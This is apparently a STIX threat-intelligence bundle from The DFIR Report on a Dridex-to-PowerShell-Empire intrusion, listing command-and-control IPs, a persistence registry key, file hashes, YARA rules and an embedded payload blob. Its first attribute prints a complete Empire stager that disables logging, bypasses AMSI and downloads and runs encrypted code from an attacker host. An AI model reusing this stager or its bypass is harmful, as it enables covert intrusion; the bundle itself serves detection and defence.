{
"type": "bundle",
"id": "bundle--946e7701-5bdd-4efe-ae94-a6626fc8092b",
"objects": [
{
"type": "identity",
"spec_version": "2.1",
"id": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-08-03T20:04:33.000Z",
"modified": "2020-08-03T20:04:33.000Z",
"name": "The DFIR Report",
"identity_class": "organization"
},
{
"type": "report",
"spec_version": "2.1",
"id": "report--946e7701-5bdd-4efe-ae94-a6626fc8092b",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-08-03T20:04:33.000Z",
"modified": "2020-08-03T20:04:33.000Z",
"name": "Dridex to Empire",
"published": "2020-08-03T20:05:47Z",
"object_refs": [
"x-misp-attribute--22da835e-04f1-4e3d-9125-3dbbe3cb7541",
"indicator--39f56fa9-58f9-4962-a4e9-809182990f7d",
"indicator--acb0c1a9-45b9-4442-986b-d10c0b5808af",
"indicator--2b113678-6c5c-4f92-b747-5fcd46fb9268",
"indicator--ef331607-0a3d-4770-b9da-33708b3e1a10",
"indicator--6593e1cf-db14-4c4d-a5e5-cda4d9e252e3",
"indicator--f9f88e60-774a-47dc-bbcc-09818cbf07a0",
"indicator--587aa626-f57e-444e-b1c1-ab3491f99a10",
"indicator--3bbfd758-3b04-47ca-80c6-04566cd9f0e2",
"indicator--da8a693e-6e63-4de8-a1ef-ef863052adb1",
"indicator--65837ca9-0bf6-4c22-92a4-72fde36d2cd4",
"indicator--cad4c1c8-ad81-4869-841d-fc5b5176d8d6",
"indicator--64479ecc-ab45-495c-875d-42a2b7b2ce92",
"indicator--c176ce15-acd2-4573-9991-8e19d4953c4f",
"indicator--e2ddf6c7-40b0-4a89-8751-7525d4693c30",
"indicator--931290f5-12fd-493e-802f-4e9e132a6a0d",
"indicator--80882b5d-a04b-4963-a324-e9778acbaec6",
"indicator--f1d301b8-3592-499e-b1b5-06c2d8e952d3",
"indicator--984b5cd1-6311-49e9-b65f-d7c684bd28f6",
"observed-data--5938cc58-c427-4a29-808b-fcdfcd62ff7d",
"url--5938cc58-c427-4a29-808b-fcdfcd62ff7d",
"indicator--be484895-ebf6-4a2d-b492-e8810cd8f793",
"indicator--46037d3e-727a-4508-8dcb-d10de58a764f",
"indicator--612fb261-eeee-4173-a89d-074aad7c64d2",
"indicator--513494bf-37dd-4704-a5ea-15155c29c4fc",
"indicator--22e9a211-22e7-45d2-9b39-33a01b5e9c69",
"indicator--7b2b9772-9059-4651-84e8-bc066e15b917",
"indicator--63b24626-a14c-4bf1-951d-fd726a7fdac2",
"indicator--9bb216ae-af15-4cba-9d65-40be296d9438",
"indicator--aec61910-1c29-47c5-88c9-37621ded62dd",
"indicator--91bd79c2-d620-474e-9e81-52a3f7fe00d7",
"indicator--2f0ff8d3-3e6b-4421-addd-6505f38211d2",
"x-misp-object--0537282b-b524-441b-bc04-7b894b342a40",
"x-misp-object--856d2b05-2aaf-42c4-bd6a-cbfdd5329cf6",
"x-misp-object--f5deb688-77b3-4f0b-b997-0692d1966239",
"x-misp-object--30d4ea8b-bb35-4cc9-aa4d-b95f65834786",
"x-misp-object--65b78289-00e3-405f-a669-e21c4b240aff",
"x-misp-object--5e30f0a7-f2e0-4669-aadd-6ef0de574e31",
"x-misp-object--b1dddcb3-12d4-4c3d-90f1-3b76ca3c2867",
"x-misp-object--cda02ce6-6495-448b-a881-94dd8b6ea251",
"x-misp-object--2b213ae5-83b6-4e62-b2e9-bb58a3375ef2",
"x-misp-object--3a117e2f-ba72-4253-aae3-e47373b3b29f",
"x-misp-object--78fb4f68-a212-4ba1-af11-4943011c012c",
"x-misp-object--47b6935a-b4bd-4045-b600-c0a4213d3ec1",
"x-misp-object--0dbb4f9b-5415-4aba-b478-3ae76496cbc0",
"x-misp-object--ae062334-3a88-45b4-9331-ed9a80fc7218",
"x-misp-object--072b4d8e-b602-458e-9a96-71242a752828"
],
"labels": [
"Threat-Report",
"misp:tool=\"MISP-STIX-Converter\"",
"Dridex",
"Powershell Empire",
"misp-galaxy:tool=\"Dridex\""
],
"object_marking_refs": [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
]
},
{
"type": "x-misp-attribute",
"spec_version": "2.1",
"id": "x-misp-attribute--22da835e-04f1-4e3d-9125-3dbbe3cb7541",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-07-15T19:55:43.000Z",
"modified": "2020-07-15T19:55:43.000Z",
"labels": [
"misp:type=\"text\"",
"misp:category=\"Artifacts dropped\"",
"misp:to_ids=\"True\""
],
"x_misp_category": "Artifacts dropped",
"x_misp_type": "text",
"x_misp_value": "If($PSVERSiOnTaBlE.PSVERsIOn.MajOr -Ge 3){$GPF=[reF].AsseMbLy.GETTYpe('System.Management.Automation.Utils').\"GETFiE`ld\"('cachedGroupPolicySettings','N'+'onPublic,Static');IF($GPF){$GPC=$GPF.GEtVaLuE($nuLl);IF($GPC['ScriptB'+'lockLogging']){$GPC['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;$GPC['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}$vaL=[CoLLECtIONS.GeneRIC.DiCtIONArY[strING,SyStem.ObJeCT]]::nEW();$VAl.ADD('EnableScriptB'+'lockLogging',0);$VaL.Add('EnableScriptBlockInvocationLogging',0);$GPC['HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptB'+'lockLogging']=$vaL}ElsE{[ScrIpTBlock].\"GetFIe`ld\"('signatures','N'+'onPublic,Static').SETValUE($NUll,(NEw-ObJect COLlecTiONs.GEneRic.HASHSet[sTrInG]))}[Ref].AsSEMbLy.GEtTyPE('System.Management.Automation.AmsiUtils')|?{$_}|%{$_.GeTFIelD('amsiInitFailed','NonPublic,Static').SETVAlue($null,$TRUe)};};[SYsTEM.NET.SerVIcEPoIntMaNAger]::ExPECt100CONTinuE=0;$Wc=New-ObJecT SYSTem.NET.WeBClIent;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};$wC.HeAdERs.ADD('User-Agent',$u);$WC.PrOXY=[SYsTEm.NET.WebREQuEst]::DeFaULTWeBProxY;$WC.PROxy.CrEDENtiAls = [SYSTeM.NeT.CREDENTIALCaChe]::DeFAULTNetWORkCREdenTialS;$Script:Proxy = $wc.Proxy;$K=[SYstEm.TExT.ENCOdiNG]::ASCII.GeTBYTES('b6dc9515bf3161700de268130726d162');$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.CoUNT])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxOR$S[($S[$I]+$S[$H])%256]}};$ser='https://194.99.22.145:443';$t='/login/process.php';$wC.HeADerS.ADD(\"Cookie\",\"session=TI47O5rucSxxojlrBjwysXKBrRQ=\");$DATA=$WC.DOWnLOADDatA($seR+$t);$iV=$daTA[0..3];$DATa=$daTA[4..$DaTA.LenGTh];-join[Char[]](& $R $DAta ($IV+$K))|IEX"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--39f56fa9-58f9-4962-a4e9-809182990f7d",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-07-15T20:32:15.000Z",
"modified": "2020-07-15T20:32:15.000Z",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '194.99.22.145']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-07-15T20:32:15Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"kill-chain:Command and Control",
"Powershell Empire"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--acb0c1a9-45b9-4442-986b-d10c0b5808af",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-07-15T20:31:54.000Z",
"modified": "2020-07-15T20:31:54.000Z",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '64.118.8.15']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-07-15T20:31:54Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"Dridex",
"kill-chain:Command and Control"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--2b113678-6c5c-4f92-b747-5fcd46fb9268",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-07-15T20:31:49.000Z",
"modified": "2020-07-15T20:31:49.000Z",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '59.148.253.194']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-07-15T20:31:49Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"Dridex",
"kill-chain:Command and Control"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--ef331607-0a3d-4770-b9da-33708b3e1a10",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-07-21T02:21:32.000Z",
"modified": "2020-07-21T02:21:32.000Z",
"pattern": "[windows-registry-key:key = '\\\\HKEY_USERS\\\\S-1-5-21-1761595937-4212512506-1431507687-12106\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Zvhlxdonjwfvei']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-07-21T02:21:32Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Persistence mechanism"
}
],
"labels": [
"misp:type=\"regkey\"",
"misp:category=\"Persistence mechanism\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--6593e1cf-db14-4c4d-a5e5-cda4d9e252e3",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-07-21T02:22:45.000Z",
"modified": "2020-07-21T02:22:45.000Z",
"pattern": "[file:name = '\\\\%APPDATA\\\\%\\\\Microsoft\\\\SystemCertificates\\\\My\\\\CRLs\\\\swET\\\\bdechangepin.exe']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-07-21T02:22:45Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload installation"
}
],
"labels": [
"misp:type=\"filename\"",
"misp:category=\"Payload installation\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--f9f88e60-774a-47dc-bbcc-09818cbf07a0",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-08-03T01:22:22.000Z",
"modified": "2020-08-03T01:22:22.000Z",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '2.58.16.87']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-08-03T01:22:22Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"Dridex",
"kill-chain:Command and Control"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--587aa626-f57e-444e-b1c1-ab3491f99a10",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-08-03T01:22:22.000Z",
"modified": "2020-08-03T01:22:22.000Z",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '144.168.239.42']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-08-03T01:22:22Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"Dridex",
"kill-chain:Command and Control"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--3bbfd758-3b04-47ca-80c6-04566cd9f0e2",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-08-03T01:22:21.000Z",
"modified": "2020-08-03T01:22:21.000Z",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '216.52.109.40']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-08-03T01:22:21Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"Dridex",
"kill-chain:Command and Control"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--da8a693e-6e63-4de8-a1ef-ef863052adb1",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-08-03T01:22:21.000Z",
"modified": "2020-08-03T01:22:21.000Z",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '88.129.221.43']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-08-03T01:22:21Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"Dridex",
"kill-chain:Command and Control"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--65837ca9-0bf6-4c22-92a4-72fde36d2cd4",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-08-03T01:22:21.000Z",
"modified": "2020-08-03T01:22:21.000Z",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '104.131.103.128']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-08-03T01:22:21Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"Dridex",
"kill-chain:Command and Control"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--cad4c1c8-ad81-4869-841d-fc5b5176d8d6",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-08-03T01:22:20.000Z",
"modified": "2020-08-03T01:22:20.000Z",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '54.39.34.24']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-08-03T01:22:20Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"Dridex",
"kill-chain:Command and Control"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--64479ecc-ab45-495c-875d-42a2b7b2ce92",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-08-03T01:22:20.000Z",
"modified": "2020-08-03T01:22:20.000Z",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '192.99.103.228']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-08-03T01:22:20Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"Dridex",
"kill-chain:Command and Control"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--c176ce15-acd2-4573-9991-8e19d4953c4f",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-08-03T01:22:20.000Z",
"modified": "2020-08-03T01:22:20.000Z",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '2.80.178.251']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-08-03T01:22:20Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"Dridex",
"kill-chain:Command and Control"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--e2ddf6c7-40b0-4a89-8751-7525d4693c30",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-08-03T01:20:19.000Z",
"modified": "2020-08-03T01:20:19.000Z",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '75.170.61.45']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-08-03T01:20:19Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"Dridex",
"kill-chain:Command and Control"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--931290f5-12fd-493e-802f-4e9e132a6a0d",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-08-03T10:20:57.000Z",
"modified": "2020-08-03T10:20:57.000Z",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '199.66.90.63']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-08-03T10:20:57Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"Dridex",
"kill-chain:Command and Control"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--80882b5d-a04b-4963-a324-e9778acbaec6",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-08-03T10:20:34.000Z",
"modified": "2020-08-03T10:20:34.000Z",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '88.129.223.244']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-08-03T10:20:34Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"Dridex",
"kill-chain:Command and Control"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--f1d301b8-3592-499e-b1b5-06c2d8e952d3",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-08-03T10:20:09.000Z",
"modified": "2020-08-03T10:20:09.000Z",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '209.74.126.2']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-08-03T10:20:09Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"Dridex",
"kill-chain:Command and Control"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--984b5cd1-6311-49e9-b65f-d7c684bd28f6",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-08-03T20:04:33.000Z",
"modified": "2020-08-03T20:04:33.000Z",
"pattern": "[/*\r\n YARA Rule Set\r\n Author: The DFIR Report\r\n Date: 2020-07-29\r\n Identifier: dridex-yara\r\n Reference: https://thedfirreport.com/2020/08/03/dridex-from-word-to-domain-dominance/\r\n*/\r\n\r\n/* Rule Set ----------------------------------------------------------------- */\r\n\r\nimport \"pe\"\r\n\r\nrule dridex_yara_ufo {\r\n meta:\r\n description = \"dridex-yara - file ufo.exe\"\r\n author = \"The DFIR Report\"\r\n reference = \"https://thedfirreport.com/2020/08/03/dridex-from-word-to-domain-dominance/\"\r\n date = \"2020-07-29\"\r\n hash1 = \"5761fd8b454c1121f80019ade53b0815bd0573dac89fe6ecd3198e7d756f1a3a\"\r\n strings:\r\n $s1 = \"mfRgb.dll\" fullword ascii\r\n $s2 = \"TESTAPP.exe\" fullword wide\r\n $s3 = \"self.exe\" fullword wide\r\n $s4 = \"usersJRB\" fullword wide\r\n $s5 = \"j13KAGsE#btwkWcu#unto2!.jT4srFRP.pdb\" fullword ascii\r\n $s6 = \"2017,2uchannelsPYDudays\" fullword wide\r\n $s7 = \"torrespondedthanfshadow\" fullword wide\r\n $s8 = \"increasing.includeda7iexample,Hofgodzilla\" fullword wide\r\n $s9 = \"haveand2system-providedreleasenoneJgZtest,\" fullword wide\r\n $s10 = \"wsupport3voftenfromR\" fullword wide\r\n $s11 = \"tofwerentheFirefox.149simplerunstableqqinformation\" fullword wide\r\n $s12 = \"11.172.2.11\" fullword wide\r\n $s13 = \"Dinsettheir\" fullword wide\r\n $s14 = \"yofthe\" fullword wide\r\n $s15 = \"TLty2_J \" fullword ascii\r\n $s16 = \"CosZTX^&% \" fullword ascii\r\n $s17 = \"Java(TM) Platform SE 8 U172\" fullword wide\r\n $s18 = \"4vthethatfour-part\" fullword wide\r\n $s19 = \"GkaChrome\" fullword wide\r\n $s20 = \"L$<;D$<\" fullword ascii /* Goodware String - occured 1 times */\r\n condition:\r\n uint16(0) == 0x5a4d and filesize < 600KB and\r\n ( pe.imphash() == \"e37c1c1a736faeeff7de27f075619f47\" and pe.exports(\"mvbFp6\") or 8 of them )\r\n}\r\n\r\nrule dridex_cannot_but_soft {\r\n meta:\r\n description = \"dridex-yara - file cannot_but_soft.xsl\"\r\n author = \"The DFIR Report\"\r\n reference = 
\"https://thedfirreport.com/2020/08/03/dridex-from-word-to-domain-dominance/\"\r\n date = \"2020-07-29\"\r\n hash1 = \"f4b75d4ddcd7b9ff5d7f867d44e4b7236c69e26807b2ca8296df1981aaf336f6\"\r\n strings:\r\n $s1 = \"var a_couch_for = [\\\"love_is_by\\\",\\\"all_but_keep\\\",\\\"summons_i_th\\\",\\\"humanity_so_we\\\",\\\"thus_hath_fed\\\",\\\"and_stood_between\\\",\" wide\r\n $s2 = \"{var and_light_than = [\\\"tween_their_course\\\",\\\"ophelia_distracted\\\",\\\"marriage_and_both\\\",\\\"of_us_grant\\\",\\\"nor_eye_and\\\",\\\"hum\" wide\r\n $s3 = \"xmlns=\\\"http://www.w3.org/1999/XSL/Transform\\\" xmlns:ms=\\\"urn:schemas-microsoft-com:xslt\\\" \" fullword wide\r\n $s4 = \"while (among_a_father + then_this_be >= new Date().getTime()) {}}\" fullword wide\r\n $s5 = \"<ms:script implements-prefix=\\\"user\\\" language=\\\"JScript\\\">\" fullword wide\r\n $s6 = \"]]> </ms:script>\" fullword wide\r\n $s7 = \"</ms:script>\" fullword wide\r\n $s8 = \"{var among_a_father = new Date().getTime();\" fullword wide\r\n $s9 = \"it_so_mope(\\\"rundll32 \\\".concat(locks_to_all.concat(\\\" \\\".concat(\\\"DllRegisterServer\\\"))))\" fullword wide\r\n $s10 = \"xmlns:user=\\\"placeholder\\\" \" fullword wide\r\n $s11 = \"var locks_to_all = \\\"%WINDIR%\\Temp/\\\".concat(\\\"/\\\".concat(my_acquittance))\" fullword wide\r\n $s12 = \"{return leaves_in_his.readystate}\" fullword wide\r\n $s13 = \"function unproportion_d_no(leaves_in_his)\" fullword wide\r\n $s14 = \"run(for_s_purpose)}}\" fullword wide\r\n $s15 = \"version=\\\"1.0\\\">\" fullword wide\r\n $s16 = \"if(beast_so_as(call_it_an)=== 150+50 && unproportion_d_no(call_it_an) === 1+3)\" fullword wide\r\n $s17 = \"var lecture_and_polonius = \\\"wscript.\\\".concat(first_corse_again);\" fullword wide\r\n $s18 = \"with (now_it_profanely){\" fullword wide
"pattern_type": "yara",
"pattern_version": "2.1",
"valid_from": "2020-08-03T20:04:33Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Artifacts dropped"
}
],
"labels": [
"misp:type=\"yara\"",
"misp:category=\"Artifacts dropped\""
]
},
{
"type": "observed-data",
"spec_version": "2.1",
"id": "observed-data--5938cc58-c427-4a29-808b-fcdfcd62ff7d",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-08-03T12:30:56.000Z",
"modified": "2020-08-03T12:30:56.000Z",
"first_observed": "2020-08-03T12:30:56Z",
"last_observed": "2020-08-03T12:30:56Z",
"number_observed": 1,
"object_refs": [
"url--5938cc58-c427-4a29-808b-fcdfcd62ff7d"
],
"labels": [
"misp:type=\"link\"",
"misp:category=\"External analysis\""
]
},
{
"type": "url",
"spec_version": "2.1",
"id": "url--5938cc58-c427-4a29-808b-fcdfcd62ff7d",
"value": "https://thedfirreport.com/2020/08/03/dridex-from-word-to-domain-dominance/"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--be484895-ebf6-4a2d-b492-e8810cd8f793",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-07-15T20:09:07.000Z",
"modified": "2020-07-15T20:09:07.000Z",
"pattern": "[file:hashes.MD5 = '92cc8b22a89cc560963407b482443b76' AND file:hashes.SHA1 = '8b0c0b84222571a70ca65c0e3e8cf459c80406fc' AND file:hashes.SHA256 = '5761fd8b454c1121f80019ade53b0815bd0573dac89fe6ecd3198e7d756f1a3a' AND file:hashes.SHA512 = '2246f494a57b0cb1623c7eb0c7dc11ca8424ad166c99cf87c7528e425167297266cf7fe56d342756560d4e5de9b1ab2d989527b0581b79edf910519cbb973475' AND file:hashes.SSDEEP = '3072:toADcjL2k0JYG5gBxUh54Ms7l+w87ESgNtY8pESenxxgSrYGRQJSwrruPK:qA26hB5gBZ74XQN99enxxgShRW6i' AND file:name = 'ufo.exe' AND file:size = '217088' AND (file:content_ref.payload_bin = 'UEsDBBQACQAIAA6h71BRtskHiu4CAABQAwAgABwAOTJjYzhiMjJhODljYzU2MDk2MzQwN2I0ODI0NDNiNzZVVAkAAzxiD188Yg9fdXgLAAEEIQAAAAQhAAAA0zIKgFQ8wzHj/YR1PvlHLFBiZwgzy9w9SYK0fADtkG5jbfiwPN03BJmf2NcHhR0gLYxaOkwdFw17sZkHIUNArOA3B8KCVc7unl0/4JBjYIqt+PgPXGd2pe5t1teSmcksxfyqTLr1lIRqS/4lyitqAPUPh7ruq/aNjpwG66cOxIT+Mzotf0PcxE+xSzanud7z3PSqrsBJ4Enaucq3nGCCtxc0zmnmwBczmLj2ieDnb+re+F+5d0bjTtf6JiH+yl5wBlrSMhcOW2obrSF6zsMLgLJrjYFbOHb7J73daay6Dza8JAlm0BliOpo9toZ9LKTZhPpfHZ3QvvlZV/brhrm7BSQ5rOkBKuNVnIdYc6UL3vIMTYVjZ6Pt/rijDZQ6dVnsBPgkyBGKmobjgL0ShVkOH/pJtGSqBmA3kL+403Zjx5z7aK6d6cdyhXGzoQOHfDhsTCHBSw2HZi1WXa/2M08wEkvE3Y5ip5OPkvHzludTQen4Ea2aakiOcBjtkz4gTQb69+yMsf+SNU44EwXOsS/bRzQofG/rOKEmiQutMcQoVsgEeN9PUQrcXUB3wNsdzl9GqvNlCBjGPwR47h/FLslvv0TGr+YwwA3PzxSs2cHe+7sFM3Kva0dV031THw75ZfG5MFm9ErdwDGLkYc34BVAIL7x6tg4g0WCpQFdcYuCT8umeP5RFP+bLz28AAQKZaJLkmldPoQu1O9K+IcZkN+XTWI07vOsoQuH7+lGzPc7eXfnx1ZJQGiTCcPayKFC5k5qB4NqRJrnEjuBQSAVLO11zBV9E7iT7wjop55EXfos9SkJ1YJxSjMnxfUjEAWv1vA2/+3bLFhPiSbZCE8eYcX0tD+uW8AkNFTpXieYfKu6Wl742SiMYH6m2P2DsIyFrDoanC4CwhBvS+Bjz86rio/Xl0y8RbJ0eqpFiZN2BjN/hyvBRpaDOyp84StydX/teTyeH4mDZPyvY82GABsz7oW2OkG8yHjhj8CoejqLRyF0qN5Fr+CwvNuKTtf5GKLem+ArwZoRAHlp38TMZnTzcgUdEYCW4A5cpJEC/Edjde+P6MGv9+mHwKCgX7zgRcgLD1sbGoLrWoe9df5FKZne9/31ORp/MsketYQfe9wXhWA/y3SMSYHVz4+SjrqF74HyWxDXujpPr73sNOW9rZq4NtOkulNZ0hNCyuvbjQjgbXBlZW1Ui58y5oBDsg2DwJH3h3yBLfktpis+lyMJF2GYjvQyWl/AZCSy7owcLO8JO8geEj9J2y1CyFoToXbOWpvjPVhn7g6NCP1DQMtlF
